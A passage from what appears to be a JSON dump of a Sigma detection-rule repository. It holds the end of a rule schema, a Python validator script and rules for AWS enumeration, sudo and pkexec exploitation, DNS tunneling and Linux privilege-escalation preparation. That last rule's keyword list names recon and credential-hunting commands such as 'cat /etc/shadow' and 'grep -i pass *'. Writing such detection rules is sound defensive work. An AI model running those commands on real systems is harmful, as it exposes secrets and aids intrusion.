of test systems\"\n        },\n        {\n          \"const\": \"experimental\",\n          \"description\": \"A new rule that hasn't been tested outside of lab environments and could lead to many false positives\"\n        },\n        {\n          \"const\": \"deprecated\",\n          \"description\": \"The rule was replaced or is now covered by another one. The link between both rules is made via the `related` field\"\n        },\n        {\n          \"const\": \"unsupported\",\n          \"description\": \"The rule can not be used in its current state (special correlation log, home-made fields, etc.)\"\n        }\n      ]\n    },\n    \"description\": {\n      \"type\": \"string\",\n      \"description\": \"A short description of the rule and the malicious activity that can be detected\",\n      \"maxLength\": 65535\n    },\n    \"license\": {\n      \"type\": \"string\",\n      \"description\": \"License of the rule according the SPDX ID specification (https://spdx.dev/ids/)\"\n    },\n    \"author\": {\n      \"type\": \"string\",\n      \"description\": \"Creator of the rule. (can be a name, nickname, twitter handle, etc.)\"\n    },\n    \"references\": {\n      \"type\": \"array\",\n      \"description\": \"References to the source that the rule was derived from. These could be blog articles, technical papers, presentations or even tweets\",\n      \"uniqueItems\": true,\n      \"items\": {\n        \"type\": \"string\"\n      }\n    },\n    \"date\": {\n      \"type\": \"string\",\n      \"description\": \"Creation date of the rule. Use the ISO 8601 format YYYY-MM-DD\",\n      \"pattern\": \"^\\\\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])$\"\n    },\n    \"modified\": {\n      \"type\": \"string\",\n      \"description\": \"Last modification date of the rule. Use the ISO 8601 format YYYY-MM-DD\",\n      \"pattern\": \"^\\\\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])$\"\n    },\n    \"logsource\": {\n      \"type\": \"object\",\n      \"description\": \"The log source that the rule is supposed to detect malicious activity in.\",\n      \"properties\": {\n        \"category\": {\n          \"description\": \"Group of products, like firewall or process_creation\",\n          \"type\": \"string\"\n        },\n        \"product\": {\n          \"description\": \"A certain product, like windows\",\n          \"type\": \"string\"\n        },\n        \"service\": {\n          \"description\": \"A subset of a product's logs, like sshd\",\n          \"type\": \"string\"\n        },\n        \"definition\":{\n          \"description\": \"can be used to describe the log source\",\n          \"type\": \"string\"\n        }\n      }\n    },\n    \"detection\": {\n      \"type\": \"object\",\n      \"required\": [\"condition\"],\n      \"description\": \"A set of search-identifiers that represent properties of searches on log data\",\n      \"additionalProperties\": {\n        \"description\": \"A Search Identifier: A definition that can consist of two different data structures - lists and maps.\",\n        \"anyOf\": [\n          {\n            \"type\": \"array\",\n            \"items\": {\n              \"anyOf\": [\n                {\n                  \"type\": \"string\"\n                },\n                {\n                  \"type\": \"integer\"\n                },\n                {\n                  \"type\": \"object\",\n                  \"items\": {\n                    \"type\": \"string\"\n                  }\n                }\n              ]\n            }\n          },\n          {\n            \"type\": \"object\",\n            \"items\": {\n              \"type\": \"string\"\n            }\n          }\n        ]\n      },\n      \"properties\": {\n        \"condition\": {\n          \"type\": \"string\",\n          \"description\": \"The relationship between the search identifiers to create the detection logic. Ex: selection1 or selection2\"\n        }\n      }\n    },\n    \"fields\": {\n      \"type\": \"array\",\n      \"description\": \"A list of log fields that could be interesting in further analysis of the event and should be displayed to the analyst\",\n      \"uniqueItems\": true,\n      \"items\": {\n        \"type\": \"string\"\n      }\n    },\n    \"falsepositives\": {\n      \"description\": \"A list of known false positives that may occur\",\n      \"uniqueItems\": true,\n      \"anyOf\": [\n        {\n          \"type\": \"string\",\n          \"minLength\": 2\n        },\n        {\n          \"type\": \"array\",\n          \"items\": {\n            \"type\": \"string\",\n            \"minLength\": 2\n          }\n        }\n      ]\n    },\n    \"level\": {\n      \"type\": \"string\",\n      \"description\": \"The criticality of a triggered rule\",\n      \"oneOf\": [\n        {\n          \"const\": \"informational\",\n          \"description\": \"Rule is intended for enrichment of events, e.g. by tagging them. No case or alerting should be triggered by such rules because it is expected that a huge amount of events will match these rules\"\n        },\n        {\n          \"const\": \"low\",\n          \"description\": \"Notable event but rarely an incident. Low rated events can be relevant in high numbers or combination with others. Immediate reaction shouldn't be necessary, but a regular review is recommended\"\n        },\n        {\n          \"const\": \"medium\",\n          \"description\": \"Relevant event that should be reviewed manually on a more frequent basis\"\n        },\n        {\n          \"const\": \"high\",\n          \"description\": \"Relevant event that should trigger an internal alert and requires a prompt review\"\n        },\n        {\n          \"const\": \"critical\",\n          \"description\": \"Highly relevant event that indicates an incident. Critical events should be reviewed immediately. It is used only for cases in which probability borders certainty\"\n        }\n      ]\n    },\n    \"tags\": {\n      \"description\": \"Tags to categorize a Sigma rule.\",\n      \"type\": \"array\",\n      \"uniqueItems\": true,\n      \"items\": {\n        \"type\": \"string\",\n        \"pattern\": \"^[a-z0-9_-]+\\\\.[a-z0-9._-]+$\"\n      }\n    },\n    \"scope\":{\n      \"description\": \"A list of intended scope of the rule\",\n      \"type\": \"array\",\n          \"items\": {\n            \"type\": \"string\",\n            \"minLength\": 2\n          }\n    }\n  }\n}\n"
  },
  {
    "path": "tests/validate-sigma-schema/validate.py",
    "content": "#!/usr/bin/env python3\n\nimport os\nimport sys\nimport requests\nimport warnings\n\nfrom pathlib import Path\nfrom typing import Any, Dict, Iterator, List, NoReturn\n\n\ndef get_envs() -> Dict[str, Any]:\n    \"\"\"Normalize the environment variables used by the action and returns them as a dictionary.\n\n    Returns:\n        Dict[str, Any]: A dictionary containing the environment variables used by the action.\n    \"\"\"\n\n    github_workspace = Path(os.environ.get(\"GITHUB_WORKSPACE\", \"./\"))\n    github_action_path = os.environ.get(\"GITHUB_ACTION_PATH\")\n    if not github_action_path:\n        github_action_path = github_workspace\n    else:\n        github_action_path = Path(github_action_path)\n\n    sigma_rules_path = os.environ.get(\"SIGMA_RULES_PATH\")\n\n    # If SIGMA_RULES_PATH is not set, use GITHUB_WORKSPACE as a fallback\n    if not sigma_rules_path:\n        sigma_rules_path = [github_workspace]\n    else:\n        # Split the SIGMA_RULES_PATH by newlines and remove empty strings\n        sigma_rules_path = [\n            github_workspace / Path(path.strip())\n            for path in sigma_rules_path.splitlines(True)\n            if path\n        ]\n\n    # If SIGMA_SCHEMA_FILE is not set, use SIGMA_SCHEMA_URL as a fallback to\n    # download the schema file from sigma-specification repository\n    sigma_schema_file = os.environ.get(\"SIGMA_SCHEMA_FILE\")\n    sigma_schema_url = os.environ.get(\n        \"SIGMA_SCHEMA_URL\",\n        \"https://raw.githubusercontent.com/SigmaHQ/sigma-specification/main/sigma-schema.json\",\n    )\n\n    return {\n        \"GITHUB_WORKSPACE\": github_workspace,\n        \"GITHUB_ACTION_PATH\": github_action_path,\n        \"SIGMA_RULES_PATH\": sigma_rules_path,\n        \"SIGMA_SCHEMA_FILE\": sigma_schema_file,\n        \"SIGMA_SCHEMA_URL\": sigma_schema_url,\n    }\n\n\ndef generate_all_files(\n    root: Path,\n    extensions: List[str] = [\".yml\"],  # TODO: Add support for multiple extensions\n    excludes: List[str] = list(),  # TODO: Add support for excludes\n) -> Iterator[Path]:\n    \"\"\"Generates all files with the given extensions in the given root directory.\n\n    Args:\n        root (Path): Root directory to start the search.\n        extensions (List[str], optional): Extensions to search for. Defaults to [\".yml\"].\n\n    Yields:\n        Iterator[Path]: Yields all files with the given extensions in the given root directory.\n    \"\"\"\n\n    for path in root.rglob(\"*\"):\n        # NOTE: path.is_file() is used to skip directories, however it will also\n        # skip symlinks to files and these symlinked files might reside in inaccessible\n        # directories, hence it'll raise a PermissionError. This is why it is run\n        # using sudo in the action.yml file. If running as sudo is not an option,\n        # the code can be modified to catch the PermissionError and skip the file.\n        try:\n            if not path.is_file() or any([path.match(ex) for ex in excludes]):\n                continue\n        except PermissionError:\n            warnings.warn(f\"PermissionError: Could not access {path}, skipping file\")\n            continue\n\n        if path.suffix in extensions:\n            yield path\n\n\ndef get_rules(sigma_rules_path: List[Path]) -> List[str] | NoReturn:\n    \"\"\"Get all rules from the given paths.\n\n    Args:\n        sigma_rules_path (List[Path]): List of paths to search for rules.\n\n    Returns:\n        List[str] | NoReturn: List of rules or exit the script if no rules are found.\n    \"\"\"\n\n    rules = list()\n    for path in sigma_rules_path:\n        for file in generate_all_files(Path(path)):\n            rules.append(str(file.resolve().absolute()))\n\n    if len(rules) == 0:\n        warnings.warn(\"No rules found, skipping validation\")\n        os._exit(-1)\n\n    return rules\n\n\ndef download_schema_file(envs: Dict[str, Any]) -> Path | NoReturn:\n    \"\"\"Download the schema file from the given URL and return its path.\n\n    Args:\n        envs (Dict[str, Any]): A dictionary containing the environment variables\n            used by the action.\n\n    Returns:\n        Path | NoReturn: Path to the schema file or exit the script if\n            the file could not be downloaded.\n    \"\"\"\n\n    schema_file = envs[\"SIGMA_SCHEMA_FILE\"]\n    schema_url = envs[\"SIGMA_SCHEMA_URL\"]\n    if not schema_file:\n        schema_file = envs[\"GITHUB_WORKSPACE\"] / \"sigma-schema.json\"\n    else:\n        schema_file = Path(schema_file)\n        if not schema_file.exists():\n            schema_file = envs[\"GITHUB_WORKSPACE\"] / schema_file\n\n    if not schema_file.exists():\n        response = requests.get(schema_url)\n        if response.status_code == 200:\n            with open(schema_file, \"wb\") as f:\n                f.write(response.content)\n        else:\n            warnings.warn(\n                f\"Failed to download schema file {schema_file}, skipping validation\"\n            )\n            os._exit(-1)\n    return (envs[\"GITHUB_WORKSPACE\"] / schema_file).absolute()\n\n\ndef help() -> None:\n    \"\"\"Prints a help message with the available commands and their descriptions.\n\n    Returns:\n        None\n    \"\"\"\n    print(\"Please provide one of the following commands:\")\n    print(\"  rules: Get all rules and return them as a string separated by spaces\")\n    print(\"  schema: Download schema file and return its path\")\n    print(\"  envs: Print all environment variables used by the action\")\n    print(\"  help: Print this help message\")\n\n\nif __name__ == \"__main__\":\n    \"\"\"Main entry point of the script.\"\"\"\n\n    if len(sys.argv) < 2:\n        print(\"No arguments provided.\")\n        help()\n        os._exit(-1)\n\n    envs = get_envs()\n    if sys.argv[1] == \"rules\":\n        print(\" \".join(get_rules(envs[\"SIGMA_RULES_PATH\"])))\n    elif sys.argv[1] == \"schema\":\n        print(download_schema_file(envs))\n    elif sys.argv[1] == \"help\":\n        help()\n    elif sys.argv[1] == \"envs\":\n        for key, value in envs.items():\n            print(f\"{key}: {value}\")\n    else:\n        print(f\"Unknown command: {sys.argv[1]}\")\n        help()\n        os._exit(-1)\n"
  },
  {
    "path": "unsupported/README.md",
    "content": "TBD"
  },
  {
    "path": "unsupported/cloud/aws_ec2_download_userdata.yml",
    "content": "title: AWS EC2 Download Userdata\nid: 26ff4080-194e-47e7-9889-ef7602efed0c\nstatus: unsupported\ndescription: Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py\nauthor: faloker\ndate: 2020/02/11\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: ec2.amazonaws.com\n        requestParameters.attribute: userData\n        eventName: DescribeInstanceAttribute\n    timeframe: 30m\n    condition: selection_source | count() > 10\nfalsepositives:\n    - Assets management software like device42\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/aws_enum_backup.yml",
    "content": "title: Potential Backup Enumeration on AWS\nid: 76255e09-755e-4675-8b6b-dbce9842cd2a\nstatus: unsupported\ndescription: Detects potential enumeration activity targeting an AWS instance backups\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022/12/13\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1580\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName:\n            - 'GetPasswordData'\n            - 'GetEbsEncryptionByDefault'\n            - 'GetEbsDefaultKmsKeyId'\n            - 'GetBucketReplication'\n            - 'DescribeVolumes'\n            - 'DescribeVolumesModifications'\n            - 'DescribeSnapshotAttribute'\n            - 'DescribeSnapshotTierStatus'\n            - 'DescribeImages'\n    timeframe: 10m\n    condition: selection | count() > 5\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/aws_enum_listing.yml",
    "content": "title: Account Enumeration on AWS\nid: e9c14b23-47e2-4a8b-8a63-d36618e33d70\nstatus: unsupported\ndescription: Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.\nauthor: toffeebr33k\ndate: 2020/11/21\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1592\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_eventname:\n        eventName: list*\n    timeframe: 10m\n    condition: selection_eventname | count() > 50\nfields:\n    - userIdentity.arn\nfalsepositives:\n    - AWS Config or other configuration scanning activities\nlevel: low\n"
  },
  {
    "path": "unsupported/cloud/aws_enum_network.yml",
    "content": "title: Potential Network Enumeration on AWS\nid: c3d53999-4b14-4ddd-9d9b-e618c366b54d\nstatus: unsupported\ndescription: Detects network enumeration performed on AWS.\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022/12/13\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName:\n            - 'DescribeCarrierGateways'\n            - 'DescribeVpcEndpointConnectionNotifications'\n            - 'DescribeTransitGatewayMulticastDomains'\n            - 'DescribeClientVpnRoutes'\n            - 'DescribeDhcpOptions'\n            - 'GetTransitGatewayRouteTableAssociations'\n    timeframe: 10m\n    condition: selection | count() > 5\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "unsupported/cloud/aws_enum_storage.yml",
    "content": "title: Potential Storage Enumeration on AWS\nid: 4723218f-2048-41f6-bcb0-417f2d784f61\nrelated:\n    - id: f305fd62-beca-47da-ad95-7690a0620084\n      type: similar\nstatus: unsupported\ndescription: Detects potential enumeration activity targeting AWS storage\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022/12/13\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1619\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 's3.amazonaws.com'\n        eventName:\n            - 'ListBuckets'\n            - 'GetBucketCors'\n            - 'GetBucketInventoryConfiguration'\n            - 'GetBucketPublicAccessBlock'\n            - 'GetBucketMetricsConfiguration'\n            - 'GetBucketPolicy'\n            - 'GetBucketTagging'\n    timeframe: 10m\n    condition: selection | count() > 5\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/aws_lambda_function_created_or_invoked.yml",
    "content": "title: AWS Lambda Function Created or Invoked\nid: d914951b-52c8-485f-875e-86abab710c0b\nstatus: unsupported\ndescription: Detects when an user creates or invokes a lambda function.\nreferences:\n    - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/\nauthor: Austin Songer @austinsonger\ndate: 2021/10/03\nmodified: 2023/03/24\ntags:\n    - attack.privilege_escalation\n    - attack.t1078\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection1:\n        eventSource: lambda.amazonaws.com\n        eventName: CreateFunction\n    selection2:\n        eventSource: lambda.amazonaws.com\n        eventName: Invoke\n    condition: selection1 | near selection2\nfalsepositives:\n    - Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "unsupported/cloud/aws_macic_evasion.yml",
    "content": "title: AWS Macie Evasion\nid: 91f6a16c-ef71-437a-99ac-0b070e3ad221\nstatus: unsupported\ndescription: Detects evade to Macie detection.\nreferences:\n    - https://docs.aws.amazon.com/cli/latest/reference/macie/\nauthor: Sittikorn S\ndate: 2021/07/06\nmodified: 2023/03/24\ntags:\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName:\n            - 'ArchiveFindings'\n            - 'CreateFindingsFilter'\n            - 'DeleteMember'\n            - 'DisassociateFromMasterAccount'\n            - 'DisassociateMember'\n            - 'DisableMacie'\n            - 'DisableOrganizationAdminAccount'\n            - 'UpdateFindingsFilter'\n            - 'UpdateMacieSession'\n            - 'UpdateMemberSession'\n            - 'UpdateClassificationJob'\n    timeframe: 10m\n    condition: selection | count() by sourceIPAddress > 5\nfields:\n    - sourceIPAddress\n    - userIdentity.arn\nfalsepositives:\n    - System or Network administrator behaviors\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/aws_ses_messaging_enabled.yml",
    "content": "title: Potential AWS Cloud Email Service Abuse\nid: 60b84424-a724-4502-bd0d-cc676e1bc90e\nstatus: unsupported\ndescription: Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022/12/12\nmodified: 2023/03/24\ntags:\n    - attack.t1583.006\n    - attack.resource_development\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection1:\n        eventSource: 'ses.amazonaws.com'\n        eventName: 'UpdateAccountSendingEnabled'\n    selection2:\n        eventSource: 'ses.amazonaws.com'\n        eventName: 'VerifyEmailIdentity'\n    timeframe: 5m\n    condition: selection1 and selection2 # We don't combine them in one selection because we want to correlate both events\nfalsepositives:\n    - Legitimate SES configuration activity\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/azure_aad_secops_signin_failure_bad_password_threshold.yml",
    "content": "title: Sign-in Failure Bad Password Threshold\nid: dff74231-dbed-42ab-ba49-83289be2ac3a\nstatus: unsupported\ndescription: Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nauthor: Corissa Koopmans, '@corissalea'\ndate: 2022/04/21\nmodified: 2023/03/24\ntags:\n    - attack.credential_access\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 50126\n        ResultDescription: Invalid username or password or Invalid on-premises username or password.\n    filter_computer:\n        TargetUserName|endswith: '$'\n    condition: selection and not filter_computer | count(TargetUserName) by IpAddress > 10\nfalsepositives:\n    - Failed Azure AD Connect Synchronization\n    - Service account use with an incorrect password specified\n    - Misconfigured systems\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml",
    "content": "title: CVE-2021-3156 Exploitation Attempt\nid: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f\nstatus: unsupported\ndescription: |\n  Detects exploitation attempt of vulnerability described in CVE-2021-3156.\n  Alternative approach might be to look for flooding of auditd logs due to bruteforcing\n  required to trigger the heap-based buffer overflow.\nreferences:\n    - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\nauthor: Bhabesh Raj\ndate: 2021/02/01\nmodified: 2023/03/24\ntags:\n    - attack.privilege_escalation\n    - attack.t1068\n    - cve.2021.3156\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    cmd_base:\n        type: 'EXECVE'\n        a0: '/usr/bin/sudoedit'\n    cmd_s:\n        - a1: '-s'\n        - a2: '-s'\n        - a3: '-s'\n        - a4: '-s'\n    cmd_backslash:\n        - a1: '\\'\n        - a2: '\\'\n        - a3: '\\'\n        - a4: '\\'\n    condition: all of cmd_* | count() by host > 50\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml",
    "content": "title: CVE-2021-3156 Exploitation Attempt Bruteforcing\nid: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2\nrelated:\n    - id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f\n      type: derived\nstatus: unsupported\ndescription: |\n  Detects exploitation attempt of vulnerability described in CVE-2021-3156.\n  Alternative approach might be to look for flooding of auditd logs due to bruteforcing.\n  required to trigger the heap-based buffer overflow.\nreferences:\n    - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\nauthor: Bhabesh Raj\ndate: 2021/02/01\nmodified: 2023/03/24\ntags:\n    - attack.privilege_escalation\n    - attack.t1068\n    - cve.2021.3156\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        exe: '/usr/bin/sudoedit'\n    condition: selection | count() by host > 50\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_cve_2021_4034.yml",
    "content": "title: Potential CVE-2021-4034 Exploitation Attempt\nid: 40a016ab-4f48-4eee-adde-bbf612695c53\nstatus: unsupported\ndescription: Detects exploitation attempt of the vulnerability described in CVE-2021-4034.\nreferences:\n    - https://github.com/berdav/CVE-2021-4034\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034\n    - https://access.redhat.com/security/cve/CVE-2021-4034\nauthor: Pawel Mazur\ndate: 2022/01/27\nmodified: 2023/03/24\ntags:\n    - attack.privilege_escalation\n    - attack.t1068\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_proctitle:\n        type: PROCTITLE\n        proctitle: '(null)'\n    selection_syscall:\n        type: SYSCALL\n        comm: pkexec\n        exe: '/usr/bin/pkexec'\n    condition: selection_proctitle |near selection_syscall\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_debugfs_usage.yml",
    "content": "title: Use of Debugfs to Access a Raw Disk\nid: fb0647d7-371a-4553-8e20-33bbbe122956\nstatus: unsupported\ndescription: Detects access to a raw disk on a host to evade detection by security products.\nreferences:\n    - https://twitter.com/0xm1rch/status/1600857731073654784?s=20&t=MdrBPqv4hnBEfAJBayMCZA\n    - https://github.com/Neo23x0/auditd/blob/master/audit.rules # required auditd config\nauthor: Janantha Marasinghe\ndate: 2022/12/20\nmodified: 2023/03/24\ntags:\n    - attack.defense_evasion\n    - attack.t1006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_debugfs:\n        type: 'EXECVE'\n        a0: 'debugfs'\n    selection_tools:\n        type: 'EXECVE'\n        a0:\n            - 'df'\n            - 'lsblk'\n            - 'pvs'\n            - 'fdisk'\n            - 'blkid'\n            - 'parted'\n            - 'hwinfo'\n            - 'inxi'\n    timeframe: 5m\n    condition: selection_debugfs | near selection_tools # requires both\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/linux/lnx_auditd_omigod_scx_runasprovider_executescript.yml",
    "content": "title: OMIGOD SCX RunAsProvider ExecuteScript\nid: 865c10a6-9541-4d11-9f45-9a3484e23b0a \ndescription: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.\nstatus: experimental\ndate: 2021/09/18\nmodified: 2021/11/11\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ntags:\n    - attack.privilege_escalation\n    - attack.initial_access\n    - attack.execution\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/\n    - https://github.com/Azure/Azure-Sentinel/pull/3071/files\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        syscall: 'execve'\n        uid: '0'\n        cwd: '/var/opt/microsoft/scx/tmp'\n        cmdline|contains: /etc/opt/microsoft/scx/conf/tmpdir/scx\n        comm: 'sh'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SCX RunAsProvider ExecuteScript.\nlevel: high\n\n"
  },
  {
    "path": "unsupported/linux/lnx_auth_susp_failed_logons_single_source.yml",
    "content": "title: Failed Logins with Different Accounts from Single Source - Linux\nid: fc947f8e-ea81-4b14-9a7b-13f888f94e18\nstatus: unsupported\ndescription: Detects suspicious failed logins with different user accounts from a single source system\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/02/16\nmodified: 2023/03/24\ntags:\n    - attack.credential_access\n    - attack.t1110\nlogsource:\n    product: linux\n    service: auth\ndetection:\n    selection:\n        pam_message: authentication failure\n        pam_user: '*'\n        pam_rhost: '*'\n    timeframe: 24h\n    condition: selection | count(pam_user) by pam_rhost > 3\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/linux/lnx_shell_priv_esc_prep.yml",
    "content": "title: Privilege Escalation Preparation\nid: 444ade84-c362-4260-b1f3-e45e20e1a905\nstatus: unsupported\ndescription: Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.\nreferences:\n    - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/\n    - https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/\n    - https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml\nauthor: Patrick Bareiss\ndate: 2019/04/05\nmodified: 2023/03/24\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        # distribution type and kernel version\n        - 'cat /etc/issue'\n        - 'cat /etc/*-release'\n        - 'cat /proc/version'\n        - 'uname -a'\n        - 'uname -mrs'\n        - 'rpm -q kernel'\n        - 'dmesg | grep Linux'\n        - 'ls /boot | grep vmlinuz-'\n        # environment variables\n        - 'cat /etc/profile'\n        - 'cat /etc/bashrc'\n        - 'cat ~/.bash_profile'\n        - 'cat ~/.bashrc'\n        - 'cat ~/.bash_logout'\n        # applications and services as root\n        - 'ps -aux | grep root'\n        - 'ps -ef | grep root'\n        # scheduled tasks\n        - 'crontab -l'\n        - 'cat /etc/cron*'\n        - 'cat /etc/cron.allow'\n        - 'cat /etc/cron.deny'\n        - 'cat /etc/crontab'\n        # search for plain text user/passwords\n        - 'grep -i user *'\n        - 'grep -i pass *'\n        # networking\n        - 'ifconfig'\n        - 'cat /etc/network/interfaces'\n        - 'cat /etc/sysconfig/network'\n        - 'cat /etc/resolv.conf'\n        - 'cat /etc/networks'\n        - 'iptables -L'\n        - 'ip6tables -L'\n        - 'lsof -i'\n        - 'netstat -antup'\n        - 'netstat -antpx'\n        - 'netstat -tulpn'\n        - 'arp -e'\n        - 'route'\n        # sensitive files\n        - 'cat /etc/passwd'\n        - 'cat /etc/group'\n        - 'cat /etc/shadow'\n        # sticky bits\n        - 'find / -perm -u=s'\n        - 'find / -perm -g=s'\n        - 'find / -perm -4000'\n        - 'find / -perm -2000'\n        # world writable files\n        - 'find / -perm -o+w'\n    timeframe: 30m\n    condition: keywords | count() by host > 6\nfalsepositives:\n    - Troubleshooting on Linux Machines\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_c2_detection.yml",
    "content": "title: Possible DNS Tunneling\nid: 1ec4b281-aa65-46a2-bdae-5fd830ed914e\nstatus: unsupported\ndescription: Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.\nreferences:\n    - https://zeltser.com/c2-dns-tunneling/\n    - https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/\nauthor: Patrick Bareiss\ndate: 2019/04/07\nmodified: 2023/03/24\ntags:\n    - attack.command_and_control\n    - attack.t1071.004\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: dns\ndetection:\n    selection:\n        parent_domain: '*'\n    condition: selection | count(dns_query) by parent_domain > 1000\nfalsepositives:\n    - Valid software, which uses dns for transferring data\nlevel: high\n"
  },
  {
    "path": "unsupported/network/net_dns_high_bytes_out.yml",
    "content": "title: High DNS Bytes Out\nid: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd\nstatus: unsupported\ndescription: High DNS queries bytes amount from host per short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query: '*'\n    timeframe: 1m\n    condition: selection | sum(question_length) by src_ip > 300000\nfalsepositives:\n    - Legitimate high DNS bytes out rate to domain name which should be added to whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_high_null_records_requests_rate.yml",
